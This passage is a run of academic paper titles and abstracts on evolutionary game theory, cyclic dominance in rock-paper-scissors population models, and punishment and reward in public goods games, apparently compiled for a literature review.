wave. It is found that suitable time and space variables are e t and e ½ ( x + a 1 r t ), where t is the time, x the distance in the direction of flow, e the growth rate of linearized theory and (− a 1 r ) the group velocity. By the method of multiple scales, A is found to satisfy a non-linear parabolic differential equation, a generalization of the time-dependent equation of earlier work. Initial conditions are given by the asymptotic solution of linearized theory. --- paper_title: Non-linear wave-number interaction in near-critical two-dimensional flows paper_content: This paper deals with a system of equations which includes as special cases the equations governing such hydrodynamic stability problems as the Taylor problem, the Benard problem, and the stability of plane parallel flow. A non-linear analysis is made of disturbances to a basic flow. The basic flow depends on a single co-ordinate η. The disturbances that are considered are represented as a superposition of many functions each of which is periodic in a co-ordinate ξ normal to η and is independent of the third co-ordinate direction. The paper considers problems in which the disturbance energy is initially concentrated in a denumerable set of ‘most dangerous’ modes whose wave-numbers are close to the critical wave-number selected by linear stability theory. It is a major result of the analysis that this concentration persists as time passes. Because of this the problem can be reduced to the study of a single non-linear partial differential equation for a special Fourier transform of the modal amplitudes. It is a striking feature of the present work that the study of a wide class of problems reduces to the study of this single fundamental equation which does not essentially depend on the specific forms ofthe operators in the original system of governing equations. Certain general conclusions are drawn from this equation, for example for some problems there exist multi-modal steady solutions which are a combination of a number of modes with different spatial periods. (Whether any such solutions are stable remains an open question.) It is also shown in other circumstances that there are solutions (at least for some interval of time) which are non-linear travelling waves whose kinematic behaviour can be clarified by the concept of group speed. --- paper_title: Global attractors and extinction dynamics of cyclically competing species paper_content: Transitions to absorbing states are of fundamental importance in nonequilibrium physics as well as ecology. In ecology, absorbing states correspond to the extinction of species. We here study the spatial population dynamics of three cyclically interacting species. The interaction scheme comprises both direct competition between species as in the cyclic Lotka-Volterra model, and separated selection and reproduction processes as in the May-Leonard model. We show that the dynamic processes leading to the transient maintenance of biodiversity are closely linked to attractors of the nonlinear dynamics for the overall species' concentrations. The characteristics of these global attractors change qualitatively at certain threshold values of the mobility and depend on the relative strength of the different types of competition between species. They give information about the scaling of extinction times with the system size and thereby the stability of biodiversity. We define an effective free energy as the negative logarithm of the probability to find the system in a specific global state before reaching one of the absorbing states. The global attractors then correspond to minima of this effective energy landscape and determine the most probable values for the species' global concentrations. As in equilibrium thermodynamics, qualitative changes in the effective free energy landscape indicate and characterize the underlying nonequilibrium phase transitions. We provide the complete phase diagrams for the population dynamics and give a comprehensive analysis of the spatio-temporal dynamics and routes to extinction in the respective phases. --- paper_title: Self-Organization of Mobile Populations in Cyclic Competition paper_content: The formation of out-of-equilibrium patterns is a characteristic feature of spatially extended, biodiverse, ecological systems. Intriguing examples are provided by cyclic competition of species, as metaphorically described by the 'rock-paper-scissors' game. Both experimentally and theoretically, such non-transitive interactions have been found to induce self-organization of static individuals into noisy, irregular clusters. However, a profound understanding and characterization of such patterns is still lacking. Here, we theoretically investigate the influence of individuals' mobility on the spatial structures emerging in rock-paper-scissors games. We devise a quantitative approach to analyze the spatial patterns self-forming in the course of the stochastic time evolution. For a paradigmatic model originally introduced by May and Leonard, within an interacting particle approach, we demonstrate that the system's behavior-in the proper continuum limit-is aptly captured by a set of stochastic partial differential equations. The system's stochastic dynamics is shown to lead to the emergence of entangled rotating spiral waves. While the spirals' wavelength and spreading velocity is demonstrated to be accurately predicted by a (deterministic) complex Ginzburg-Landau equation, their entanglement results from the inherent stochastic nature of the system. These findings and our methods have important applications for understanding the formation of noisy patterns, e.g. in ecological and evolutionary contexts, and are also of relevance for the kinetics of (bio)-chemical reactions. --- paper_title: Mutual Feedbacks Maintain Both Genetic and Species Diversity in a Plant Community paper_content: The forces that maintain genetic diversity among individuals and diversity among species are usually studied separately. Nevertheless, diversity at one of these levels may depend on the diversity at the other. We have combined observations of natural populations, quantitative genetics, and field experiments to show that genetic variation in the concentration of an allelopathic secondary compound in Brassica nigra is necessary for the coexistence of B. nigra and its competitor species. In addition, the diversity of competing species was required for the maintenance of genetic variation in the trait within B. nigra. Thus, conservation of species diversity may also necessitate maintenance of the processes that sustain the genetic diversity of each individual species. --- paper_title: Noise and Correlations in a Spatial Population Model with Cyclic Competition paper_content: Noise and spatial degrees of freedom characterize most ecosystems. Some aspects of their influence on the coevolution of populations with cyclic interspecies competition have been demonstrated in recent experiments e.g., B. Kerr , Nature (London) 418, 171 (2002)]. To reach a better theoretical understanding of these phenomena, we consider a paradigmatic spatial model where three species exhibit cyclic dominance. Using an individual-based description, as well as stochastic partial differential and deterministic reaction-diffusion equations, we account for stochastic fluctuations and spatial diffusion at different levels and show how fascinating patterns of entangled spirals emerge. We rationalize our analysis by computing the spatiotemporal correlation functions and provide analytical expressions for the front velocity and the wavelength of the propagating spiral waves. --- paper_title: A time dependent Ginzburg-Landau equation and its application to the problem of resistivity in the mixed state paper_content: A time dependent modification of the Ginzburg-Landau equation is given which is based on the assumption that the functional derivative of the Ginzburg-Landau free energy expression with respect to the wave function is a generalized force in the sense of irreversible thermodynamics acting on the wave function. This equation implies an energy theorem, according to which the energy can be dissipated by i) production of Joule heat; ii) irreversible variation of the wave function. The theory is a limiting case of the BCS theory, and hence, it contains no adjustable parameters. The application of the modified equation to the problem of resistivity in the mixed state reveals satisfactory agreement between experiment and theory for reduced temperatures higher than 0.6. --- paper_title: Characterization of spiraling patterns in spatial rock-paper-scissors games paper_content: The spatiotemporal arrangement of interacting populations often influences the maintenance of species diversity and is a subject of intense research. Here, we study the spatiotemporal patterns arising from the cyclic competition between three species in two dimensions. Inspired by recent experiments, we consider a generic metapopulation model comprising “rock-paper-scissors” interactions via dominance removal and replacement, reproduction, mutations, pair exchange, and hopping of individuals. By combining analytical and numerical methods, we obtain the model's phase diagram near its Hopf bifurcation and quantitatively characterize the properties of the spiraling patterns arising in each phase. The phases characterizing the cyclic competition away from the Hopf bifurcation (at low mutation rate) are also investigated. Our analytical approach relies on the careful analysis of the properties of the complex Ginzburg-Landau equation derived through a controlled (perturbative) multiscale expansion around the model's Hopf bifurcation. Our results allow us to clarify when spatial “rock-paper-scissors” competition leads to stable spiral waves and under which circumstances they are influenced by nonlinear mobility. --- paper_title: Evolutionary Games and Population Dynamics paper_content: Every form of behavior is shaped by trial and error. Such stepwise adaptation can occur through individual learning or through natural selection, the basis of evolution. Since the work of Maynard Smith and others, it has been realized how game theory can model this process. Evolutionary game theory replaces the static solutions of classical game theory by a dynamical approach centered not on the concept of rational players but on the population dynamics of behavioral programs. In this book the authors investigate the nonlinear dynamics of the self-regulation of social and economic behavior, and of the closely related interactions among species in ecological communities. Replicator equations describe how successful strategies spread and thereby create new conditions that can alter the basis of their success, i.e., to enable us to understand the strategic and genetic foundations of the endless chronicle of invasions and extinctions that punctuate evolution. In short, evolutionary game theory describes when to escalate a conflict, how to elicit cooperation, why to expect a balance of the sexes, and how to understand natural selection in mathematical terms. ::: ::: Comprehensive treatment of ecological and game theoretic dynamics ::: Invasion dynamics and permanence as key concepts ::: Explanation in terms of games of things like competition between species --- paper_title: Evolutionary Game Theory: Theoretical Concepts and Applications to Microbial Communities paper_content: Ecological systems are complex assemblies of large numbers of individuals, interacting competitively under multifaceted environmental conditions. Recent studies using microbial laboratory communities have revealed some of the self-organization principles underneath the complexity of these systems. A major role of the inherent stochasticity of its dynamics and the spatial segregation of different interacting species into distinct patterns has thereby been established. It ensures the viability of microbial colonies by allowing for species diversity, cooperative behavior and other kinds of “social” behavior. ::: ::: A synthesis of evolutionary game theory, nonlinear dynamics, and the theory of stochastic processes provides the mathematical tools and a conceptual framework for a deeper understanding of these ecological systems. We give an introduction into the modern formulation of these theories and illustrate their effectiveness focussing on selected examples of microbial systems. Intrinsic fluctuations, stemming from the discreteness of individuals, are ubiquitous, and can have an important impact on the stability of ecosystems. In the absence of speciation, extinction of species is unavoidable. It may, however, take very long times. We provide a general concept for defining survival and extinction on ecological time-scales. Spatial degrees of freedom come with a certain mobility of individuals. When the latter is sufficiently high, bacterial community structures can be understood through mapping individual-based models, in a continuum approach, onto stochastic partial differential equations. These allow progress using methods of nonlinear dynamics such as bifurcation analysis and invariant manifolds. We conclude with a perspective on the current challenges in quantifying bacterial pattern formation, and how this might have an impact on fundamental research in non-equilibrium physics. --- paper_title: Correlation of positive and negative reciprocity fails to confer an evolutionary advantage: Phase transitions to elementary strategies paper_content: Economic experiments reveal that humans value cooperation and fairness. Punishing unfair behavior is therefore common, and according to the theory of strong reciprocity, it is also directly related to rewarding cooperative behavior. However, empirical data fail to confirm that positive and negative reciprocity are correlated. Inspired by this disagreement, we determine whether the combined application of reward and punishment is evolutionary advantageous. We study a spatial public goods game, where in addition to the three elementary strategies of defection, rewarding and punishment, a fourth strategy combining the later two competes for space. We find rich dynamical behavior that gives rise to intricate phase diagrams where continuous and discontinuous phase transitions occur in succession. Indirect territorial competition, spontaneous emergence of cyclic dominance, as well as divergent fluctuations of oscillations that terminate in an absorbing phase are observed. Yet despite the high complexity of solutions, the combined strategy can survive only in very narrow and unrealistic parameter regions. Elementary strategies, either in pure or mixed phases, are much more common and likely to prevail. Our results highlight the importance of patterns and structure in human cooperation, which should be considered in future experiments. --- paper_title: Punishing and abstaining for public goods. paper_content: The evolution of cooperation within sizable groups of nonrelated humans offers many challenges for our understanding. Current research has highlighted two factors boosting cooperation in public goods interactions, namely, costly punishment of defectors and the option to abstain from the joint enterprise. A recent modeling approach has suggested that the autarkic option acts as a catalyzer for the ultimate fixation of altruistic punishment. We present an alternative, more microeconomically based model that yields a bistable outcome instead. Evolutionary dynamics can lead either to a Nash equilibrium of punishing and nonpunishing cooperators or to an oscillating state without punishers. --- paper_title: Self-organization of punishment in structured populations paper_content: Cooperation is crucial for the remarkable evolutionary success of the human species. Not surprisingly, some individuals are willing to bear additional costs in order to punish defectors. Current models assume that, once set, the fine and cost of punishment do not change over time. Here we show that relaxing this assumption by allowing players to adapt their sanctioning efforts in dependence on the success of cooperation can explain both the spontaneous emergence of punishment and its ability to deter defectors and those unwilling to punish them with globally negligible investments. By means of phase diagrams and the analysis of emerging spatial patterns, we demonstrate that adaptive punishment promotes public cooperation through the invigoration of spatial reciprocity, the prevention of the emergence of cyclic dominance, or the provision of competitive advantages to those that sanction antisocial behavior. The results presented indicate that the process of self-organization significantly elevates the effectiveness of punishment, and they reveal new mechanisms by means of which this fascinating and widespread social behavior could have evolved. --- paper_title: Evolutionary dynamics of group interactions on structured populations: A review paper_content: Interactions among living organisms, from bacteria colonies to human societies, are inherently more complex than interactions among particles and non-living matter. Group interactions are a particularly important and widespread class, representative of which is the public goods game. In addition, methods of statistical physics have proved valuable for studying pattern formation, equilibrium selection and self-organization in evolutionary games. Here, we review recent advances in the study of evolutionary dynamics of group interactions on top of structured populations, including lattices, complex networks and coevolutionary models. We also compare these results with those obtained on well-mixed populations. The review particularly highlights that the study of the dynamics of group interactions, like several other important equilibrium and non-equilibrium dynamical processes in biological, economical and social sciences, benefits from the synergy between statistical physics, network science and evolutionary game theory. --- paper_title: Phase diagrams for three-strategy evolutionary prisoner's dilemma games on regular graphs paper_content: Evolutionary prisoner's dilemma games are studied with players located on square lattice and random regular graph defining four neighbors for each one. The players follow one of the three strategies: tit-for-tat, unconditional cooperation, and defection. The simplified payoff matrix is characterized by two parameters: the temptation b to choose defection and the cost c of inspection reducing the income of tit-for-tat. The strategy imitation from one of the neighbors is controlled by pairwise comparison at a fixed level of noise. Using Monte Carlo simulations and the extended versions of pair approximation we have evaluated the b-c phase diagrams indicating a rich plethora of phase transitions between stationary coexistence, absorbing, and oscillatory states, including continuous and discontinuous phase transitions. By reasonable costs the tit-for-tat strategy prevents extinction of cooperators across the whole span of b determining the prisoner's dilemma game, irrespective of the connectivity structure. We also demonstrate that the system can exhibit a repetitive succession of oscillatory and stationary states upon changing a single payoff value, which highlights the remarkable sensitivity of cyclical interactions on the parameters that define the strength of dominance. --- paper_title: Incentives and opportunism: from the carrot to the stick paper_content: Cooperation in public good games is greatly promoted by positive and negative incentives. In this paper, we use evolutionary game dynamics to study the evolution of opportunism (the readiness to be swayed by incentives) and the evolution of trust (the propensity to cooperate in the absence of information on the co-players). If both positive and negative incentives are available, evolution leads to a population where defectors are punished and players cooperate, except when they can get away with defection. Rewarding behaviour does not become fixed, but can play an essential role in catalysing the emergence of cooperation, especially if the information level is low. --- paper_title: The evolution of sanctioning institutions: an experimental approach to the social contract paper_content: A vast amount of empirical and theoretical research on public good games indicates that the threat of punishment can curb free-riding in human groups engaged in joint enterprises. Since punishment is often costly, however, this raises an issue of second-order free-riding: indeed, the sanctioning system itself is a common good which can be exploited. Most investigations, so far, considered peer punishment: players could impose fines on those who exploited them, at a cost to themselves. Only a minority considered so-called pool punishment. In this scenario, players contribute to a punishment pool before engaging in the joint enterprise, and without knowing who the free-riders will be. Theoretical investigations (Sigmund et al., Nature 466:861–863, 2010) have shown that peer punishment is more efficient, but pool punishment more stable. Social learning, i.e., the preferential imitation of successful strategies, should lead to pool punishment if sanctions are also imposed on second-order free-riders, but to peer punishment if they are not. Here we describe an economic experiment (the Mutual Aid game) which tests this prediction. We find that pool punishment only emerges if second-order free riders are punished, but that peer punishment is more stable than expected. Basically, our experiment shows that social learning can lead to a spontaneously emerging social contract, based on a sanctioning institution to overcome the free rider problem. --- paper_title: Volunteering leads to rock–paper–scissors dynamics in a public goods game paper_content: Collective efforts are a trademark of both insect and human societies1. They are achieved through relatedness in the former2 and unknown mechanisms in the latter. The problem of achieving cooperation among non-kin has been described as the ‘tragedy of the commons’, prophesying the inescapable collapse of many human enterprises3,4. In public goods experiments, initial cooperation usually drops quickly to almost zero5. It can be maintained by the opportunity to punish defectors6 or the need to maintain good reputation7. Both schemes require that defectors are identified. Theorists propose that a simple but effective mechanism operates under full anonymity. With optional participation in the public goods game, ‘loners’ (players who do not join the group), defectors and cooperators will coexist through rock–paper–scissors dynamics8,9. Here we show experimentally that volunteering generates these dynamics in public goods games and that manipulating initial conditions can produce each predicted direction. If, by manipulating displayed decisions, it is pretended that defectors have the highest frequency, loners soon become most frequent, as do cooperators after loners and defectors after cooperators. On average, cooperation is perpetuated at a substantial level. --- paper_title: Effects of punishment in a mobile population playing the prisoner's dilemma game paper_content: We deal with a system of prisoner's dilemma players undergoing continuous motion in a two-dimensional plane. In contrast to previous work, we introduce altruistic punishment after the game. We find punishing only a few of the cooperator-defector interactions is enough to lead the system to a cooperative state in environments where otherwise defection would take over the population. This happens even with soft nonsocial punishment (where both cooperators and defectors punish other players, a behavior observed in many human populations). For high enough mobilities or temptations to defect, low rates of social punishment can no longer avoid the breakdown of cooperation. --- paper_title: Evolutionary advantages of adaptive rewarding paper_content: Our well-being depends on both our personal success and the success of our society. The realization of this fact makes cooperation an essential trait. Experiments have shown that rewards can elevate our readiness to cooperate, but since giving a reward inevitably entails paying a cost for it, the emergence and stability of such behavior remains elusive. Here we show that allowing for the act of rewarding to self-organize in dependence on the success of cooperation creates several evolutionary advantages that instill new ways through which collaborative efforts are promoted. Ranging from indirect territorial battle to the spontaneous emergence and destruction of coexistence, phase diagrams and the underlying spatial patterns reveal fascinatingly rich social dynamics that explain why this costly behavior has evolved and persevered. Comparisons with adaptive punishment, however, uncover an Achilles heel of adaptive rewarding, coming from over-aggression, which in turn hinders optimal utilization of network reciprocity. This may explain why, despite its success, rewarding is not as firmly embedded into our societal organization as punishment. --- paper_title: Dynamically generated cyclic dominance in spatial prisoner's dilemma games paper_content: We have studied the impact of time-dependent learning capacities of players in the framework of spatial prisoner's dilemma game. In our model, this capacity of players may decrease or increase in time after strategy adoption according to a step-like function. We investigated both possibilities separately and observed significantly different mechanisms that form the stationary pattern of the system. The time decreasing learning activity helps cooperator domains to recover the possible intrude of defectors hence supports cooperation. In the other case the temporary restrained learning activity generates a cyclic dominance between defector and cooperator strategies, which helps to maintain the diversity of strategies via propagating waves. The results are robust and remain valid by changing payoff values, interaction graphs or functions characterizing time-dependence of learning activity. Our observations suggest that dynamically generated mechanisms may offer alternative ways to keep cooperators alive even at very larger temptation to defect. --- paper_title: Reward and cooperation in the spatial public goods game paper_content: The promise of punishment and reward in promoting public cooperation is debatable. While punishment is traditionally considered more successful than reward, the fact that the cost of punishment frequently fails to offset gains from enhanced cooperation has lead some to reconsider reward as the main catalyst behind collaborative efforts. Here we elaborate on the"stick versus carrot"dilemma by studying the evolution of cooperation in the spatial public goods game, where besides the traditional cooperators and defectors, rewarding cooperators supplement the array of possible strategies. The latter are willing to reward cooperative actions at a personal cost, thus effectively downgrading pure cooperators to second-order free-riders due to their unwillingness to bear these additional costs. Consequently, we find that defection remains viable, especially if the rewarding is costly. Rewards, however, can promote cooperation, especially if the synergetic effects of cooperation are low. Surprisingly, moderate rewards may promote cooperation better than high rewards, which is due to the spontaneous emergence of cyclic dominance between the three strategies. --- paper_title: Evolutionary establishment of moral and double moral standards through spatial interactions paper_content: Situations where individuals have to contribute to joint efforts or share scarce resources are ubiquitous. Yet, without proper mechanisms to ensure cooperation, the evolutionary pressure to maximize individual success tends to create a tragedy of the commons (such as over-fishing or the destruction of our environment). This contribution addresses a number of related puzzles of human behavior with an evolutionary game theoretical approach as it has been successfully used to explain the behavior of other biological species many times, from bacteria to vertebrates. Our agent-based model distinguishes individuals applying four different behavioral strategies: non-cooperative individuals ("defectors"), cooperative individuals abstaining from punishment efforts (called "cooperators" or "second-order free-riders"), cooperators who punish non-cooperative behavior ("moralists"), and defectors, who punish other defectors despite being non-cooperative themselves ("immoralists"). By considering spatial interactions with neighboring individuals, our model reveals several interesting effects: First, moralists can fully eliminate cooperators. This spreading of punishing behavior requires a segregation of behavioral strategies and solves the "second-order free-rider problem". Second, the system behavior changes its character significantly even after very long times ("who laughs last laughs best effect"). Third, the presence of a number of defectors can largely accelerate the victory of moralists over non-punishing cooperators. Fourth, in order to succeed, moralists may profit from immoralists in a way that appears like an "unholy collaboration". Our findings suggest that the consideration of punishment strategies allows one to understand the establishment and spreading of "moral behavior" by means of game-theoretical concepts. This demonstrates that quantitative biological modeling approaches are powerful even in domains that have been addressed with non-mathematical concepts so far. The complex dynamics of certain social behaviors become understandable as the result of an evolutionary competition between different behavioral strategies. --- paper_title: Indirect reciprocity can stabilize cooperation without the second-order free rider problem paper_content: Models of large-scale human cooperation take two forms. ‘Indirect reciprocity’1 occurs when individuals help others in order to uphold a reputation and so be included in future cooperation. In ‘collective action’2, individuals engage in costly behaviour that benefits the group as a whole. Although the evolution of indirect reciprocity is theoretically plausible3,4,5,6, there is no consensus about how collective action evolves. Evidence suggests that punishing free riders can maintain cooperation7,8,9, but why individuals should engage in costly punishment is unclear. Solutions to this ‘second-order free rider problem’ include meta-punishment10, mutation11, conformism12, signalling13,14,15 and group-selection16,17,18. The threat of exclusion from indirect reciprocity can sustain collective action in the laboratory19. Here, we show that such exclusion is evolutionarily stable, providing an incentive to engage in costly cooperation, while avoiding the second-order free rider problem because punishers can withhold help from free riders without damaging their reputations. However, we also show that such a strategy cannot invade a population in which indirect reciprocity is not linked to collective action, thus leaving unexplained how collective action arises. --- paper_title: The evolution of altruistic punishment paper_content: Both laboratory and field data suggest that people punish noncooperators even in one-shot interactions. Although such “altruistic punishment” may explain the high levels of cooperation in human societies, it creates an evolutionary puzzle: existing models suggest that altruistic cooperation among nonrelatives is evolutionarily stable only in small groups. Thus, applying such models to the evolution of altruistic punishment leads to the prediction that people will not incur costs to punish others to provide benefits to large groups of nonrelatives. However, here we show that an important asymmetry between altruistic cooperation and altruistic punishment allows altruistic punishment to evolve in populations engaged in one-time, anonymous interactions. This process allows both altruistic punishment and altruistic cooperation to be maintained even when groups are large and other parameter values approximate conditions that characterize cultural evolution in the small-scale societies in which humans lived for most of our prehistory. --- paper_title: Reward and punishment paper_content: Minigames capturing the essence of Public Goods experiments show that even in the absence of rationality assumptions, both punishment and reward will fail to bring about prosocial behavior. This result holds in particular for the well-known Ultimatum Game, which emerges as a special case. But reputation can induce fairness and cooperation in populations adapting through learning or imitation. Indeed, the inclusion of reputation effects in the corresponding dynamical models leads to the evolution of economically productive behavior, with agents contributing to the public good and either punishing those who do not or rewarding those who do. Reward and punishment correspond to two types of bifurcation with intriguing complementarity. The analysis suggests that reputation is essential for fostering social behavior among selfish agents, and that it is considerably more effective with punishment than with reward. --- paper_title: Phase diagrams for the spatial public goods game with pool-punishment paper_content: The efficiency of institutionalized punishment is studied by evaluating the stationary states in the spatial public goods game comprising unconditional defectors, cooperators, and cooperating pool punishers as the three competing strategies. Fines and costs of pool punishment are considered as the two main parameters determining the stationary distributions of strategies on the square lattice. Each player collects a payoff from five five-person public goods games, and the evolution of strategies is subsequently governed by imitation based on pairwise comparisons at a low level of noise. The impact of pool punishment on the evolution of cooperation in structured populations is significantly different from that reported previously for peer punishment. Representative phase diagrams reveal remarkably rich behavior, depending also on the value of the synergy factor that characterizes the efficiency of investments payed into the common pool. Besides traditional single- and two-strategy stationary states, a rock-paper-scissors type of cyclic dominance can emerge in strikingly different ways. --- paper_title: Rare but severe concerted punishment that favors cooperation. paper_content: As one of the mechanisms that are supposed to explain the evolution of cooperation among unrelated individuals, costly punishment, in which altruistic individuals privately bear the cost to punish defection, suffers from such drawbacks as decreasing individuals' welfare, inducing second-order free riding, the difficulty of catching defection, and the possibility of triggering retaliation. To improve this promising mechanism, here we propose an extended Public Goods game with rare but severe concerted punishment, in which once a defector is caught punishment is triggered and the cost of punishment is equally shared among the remainder of the group. Analytical results show that, when the probability for concerted punishment is above a threshold, cooperating is, while defecting is not, an evolutionarily stable strategy in finite populations, and that this way of punishment can considerably decrease the total cost of inhibiting defection, especially in large populations. --- paper_title: Public goods games with reward in finite populations paper_content: Public goods games paraphrase the problem of cooperation in game theoretical terms. Cooperators contribute to a public good and thereby increase the welfare of others at a cost to themselves. Defectors consume the public good but do not pay its cost and therefore outperform cooperators. Hence, according to genetic or cultural evolution, defectors should be favored and the public good disappear – despite the fact that groups of cooperators are better off than groups of defectors. The maximization of short term individual profits causes the demise of the common resource to the detriment of all. This outcome can be averted by introducing incentives to cooperate. Negative incentives based on the punishment of defectors efficiently stabilize cooperation once established but cannot initiate cooperation. Here we consider the complementary case of positive incentives created by allowing individuals to reward those that contribute to the public good. The finite-population stochastic dynamics of the public goods game with reward demonstrate that reward initiates cooperation by providing an escape hatch out of states of mutual defection. However, in contrast to punishment, reward is unable to stabilize cooperation but, instead, gives rise to a persistent minority of cooperators. --- paper_title: Cooperation for volunteering and partially random partnerships paper_content: Competition among cooperative, defective, and loner strategies is studied by considering an evolutionary prisoner's dilemma game for different partnerships. In this game each player can adopt one of its coplayer's strategy with a probability depending on the difference of payoffs coming from games with the corresponding coplayers. Our attention is focused on the effects of annealed and quenched randomness in the partnership for fixed number of coplayers. It is shown that only the loners survive if the four coplayers are chosen randomly (mean-field limit). On the contrary, on the square lattice all the three strategies are maintained by the cyclic invasions resulting in a self-organizing spatial pattern. If the fixed partnership is described by a regular small-world structure then a homogeneous oscillation occurs in the population dynamics when the measure of quenched randomness exceeds a threshold value. Similar behavior with higher sensitivity to the randomness is found if temporary partners are substituted for the standard ones with some probability at each step of iteration. --- paper_title: Emergence of synchronization induced by the interplay between two prisoner's dilemma games with volunteering in small-world networks paper_content: We studied synchronization between prisoner's dilemma games with voluntary participation in two Newman-Watts small-world networks. It was found that there are three kinds of synchronization: partial phase synchronization, total phase synchronization, and complete synchronization, for varied coupling factors. Besides, two games can reach complete synchronization for the large enough coupling factor. We also discussed the effect of the coupling factor on the amplitude of oscillation of cooperator density. --- paper_title: Defense mechanisms of empathetic players in the spatial ultimatum game paper_content: Experiments on the ultimatum game have revealed that humans are remarkably fond of fair play. When asked to share an amount of money, unfair offers are rare and their acceptance rate small. While empathy and spatiality may lead to the evolution of fairness, thus far considered continuous strategies have precluded the observation of solutions that would be driven by pattern formation. Here we introduce a spatial ultimatum game with discrete strategies, and we show that this simple alteration opens the gate to fascinatingly rich dynamical behavior. In addition to mixed stationary states, we report the occurrence of traveling waves and cyclic dominance, where one strategy in the cycle can be an alliance of two strategies. The highly webbed phase diagram, entailing continuous and discontinuous phase transitions, reveals hidden complexity in the pursuit of human fair play. --- paper_title: Phase transitions and volunteering in spatial public goods games. paper_content: We present a simple yet effective mechanism promoting cooperation under full anonymity by allowing for voluntary participation in public goods games. This natural extension leads to "rock-scissors-paper"-type cyclic dominance of the three strategies, cooperate, defect, and loner. In spatial settings with players arranged on a regular lattice, this results in interesting dynamical properties and intriguing spatiotemporal patterns. In particular, variations of the value of the public good leads to transitions between one-, two-, and three-strategy states which either are in the class of directed percolation or show interesting analogies to Ising-type models. Although volunteering is incapable of stabilizing cooperation, it efficiently prevents successful spreading of selfish behavior. --- paper_title: Moral assessment in indirect reciprocity paper_content: Indirect reciprocity is one of the mechanisms for cooperation, and seems to be of particular interest for the evolution of human societies. A large part is based on assessing reputations and acting accordingly. This paper gives a brief overview of different assessment rules for indirect reciprocity, and studies them by using evolutionary game dynamics. Even the simplest binary assessment rules lead to complex outcomes and require considerable cognitive abilities. --- paper_title: The take-it-or-leave-it option allows small penalties to overcome social dilemmas paper_content: Self-interest frequently causes individuals engaged in joint enterprises to choose actions that are counterproductive. Free-riders can invade a society of cooperators, causing a tragedy of the commons. Such social dilemmas can be overcome by positive or negative incentives. Even though an incentive-providing institution may protect a cooperative society from invasion by free-riders, it cannot always convert a society of free-riders to cooperation. In the latter case, both norms, cooperation and defection, are stable: To avoid a collapse to full defection, cooperators must be sufficiently numerous initially. A society of free-riders is then caught in a social trap, and the institution is unable to provide an escape, except at a high, possibly prohibitive cost. Here, we analyze the interplay of (a) incentives provided by institutions and (b) the effects of voluntary participation. We show that this combination fundamentally improves the efficiency of incentives. In particular, optional participation allows institutions punishing free-riders to overcome the social dilemma at a much lower cost, and to promote a globally stable regime of cooperation. This removes the social trap and implies that whenever a society of cooperators cannot be invaded by free-riders, it will necessarily become established in the long run, through social learning, irrespective of the initial number of cooperators. We also demonstrate that punishing provides a “lighter touch” than rewarding, guaranteeing full cooperation at considerably lower cost. --- paper_title: Optional contributions have positive effects for volunteering public goods games paper_content: Public goods (PG) games with the volunteering mechanism are referred to as volunteering public goods (VPG) games, in which loners are introduced to the PG games, and a loner obtains a constant payoff but not participating the game. Considering that small contributions may have positive effects to encourage more players with bounded rationality to contribute, this paper introduces optional contributions (high value or low value) to these typical VPG games—a cooperator can contribute a high or low payoff to the public pools. With the low contribution, the logit dynamics show that cooperation can be promoted in a well mixed population comparing to the typical VPG games, furthermore, as the multiplication factor is greater than a threshold, the average payoff of the population is also enhanced. In spatial VPG games, we introduce a new adjusting mechanism that is an approximation to best response. Some results in agreement with the prediction of the logit dynamics are found. These simulation results reveal that for VPG games the option of low contributions may be a better method to stimulate the growth of cooperation frequency and the average payoff of the population. --- paper_title: Altruistic Punishment and the Origin of Cooperation paper_content: How did human cooperation evolve? Recent evidence shows that many people are willing to engage in altruistic punishment, voluntarily paying a cost to punish noncooperators. Although this behavior helps to explain how cooperation can persist, it creates an important puzzle. If altruistic punishment provides benefits to nonpunishers and is costly to punishers, then how could it evolve? Drawing on recent insights from voluntary public goods games, I present a simple evolutionary model in which altruistic punishers can enter and will always come to dominate a population of contributors, defectors, and nonparticipants. The model suggests that the cycle of strategies in voluntary public goods games does not persist in the presence of punishment strategies. It also suggests that punishment can only enforce payoff-improving strategies, contrary to a widely cited “folk theorem” result that suggests that punishment can allow the evolution of any strategy. --- paper_title: Fixation and escape times in stochastic game learning paper_content: Evolutionary dynamics in finite populations is known to fixate eventually in the absence of mutation. We here show that a similar phenomenon can be found in stochastic game dynamical batch learning, and investigate fixation in learning processes in a simple 2×2 game, for two-player games with cyclic interaction, and in the context of the best-shot network game. The analogues of finite populations in evolution are here finite batches of observations between strategy updates. We study when and how such fixation can occur, and present results on the average time-to-fixation from numerical simulations. Simple cases are also amenable to analytical approaches and we provide estimates of the behaviour of so-called escape times as a function of the batch size. The differences and similarities with escape and fixation in evolutionary dynamics are discussed. --- paper_title: Dynamically generated cyclic dominance in spatial prisoner's dilemma games paper_content: We have studied the impact of time-dependent learning capacities of players in the framework of spatial prisoner's dilemma game. In our model, this capacity of players may decrease or increase in time after strategy adoption according to a step-like function. We investigated both possibilities separately and observed significantly different mechanisms that form the stationary pattern of the system. The time decreasing learning activity helps cooperator domains to recover the possible intrude of defectors hence supports cooperation. In the other case the temporary restrained learning activity generates a cyclic dominance between defector and cooperator strategies, which helps to maintain the diversity of strategies via propagating waves. The results are robust and remain valid by changing payoff values, interaction graphs or functions characterizing time-dependence of learning activity. Our observations suggest that dynamically generated mechanisms may offer alternative ways to keep cooperators alive even at very larger temptation to defect. --- paper_title: Impact of aging on the evolution of cooperation in the spatial prisoner's dilemma game paper_content: Aging is always present, tailoring our interactions with others, and postulating a finite lifespan during which we are able to exercise them. We consider the prisoner's dilemma game on a square lattice and examine how quenched age distributions and different aging protocols influence the evolution of cooperation when taking the life experience and knowledge accumulation into account as time passes. In agreement with previous studies, we find that a quenched assignment of age to players, introducing heterogeneity to the game, substantially promotes cooperative behavior. Introduction of aging and subsequent death as a coevolutionary process may act detrimental on cooperation but enhances it efficiently if the offspring of individuals that have successfully passed their strategy is considered newborn. We study resulting age distributions of players and show that the heterogeneity is vital-yet insufficient-for explaining the observed differences in cooperator abundance on the spatial grid. The unexpected increment of cooperation levels can be explained by a dynamical effect that has a highly selective impact on the propagation of cooperator and defector states. --- paper_title: Intrinsic noise in game dynamical learning paper_content: Demographic noise has profound effects on evolutionary and population dynamics, as well as on chemical reaction systems and models of epidemiology. Such noise is intrinsic and due to the discreteness of the dynamics in finite populations. We here show that similar noise-sustained trajectories arise in game dynamical learning, where the stochasticity has a different origin: agents sample a finite number of moves of their opponents in between adaptation events. The limit of infinite batches results in deterministic modified replicator equations, whereas finite sampling leads to a stochastic dynamics. The characteristics of these fluctuations can be computed analytically using methods from statistical physics, and such noise can affect the attractors significantly, leading to noise-sustained cycling or removing periodic orbits of the standard replicator 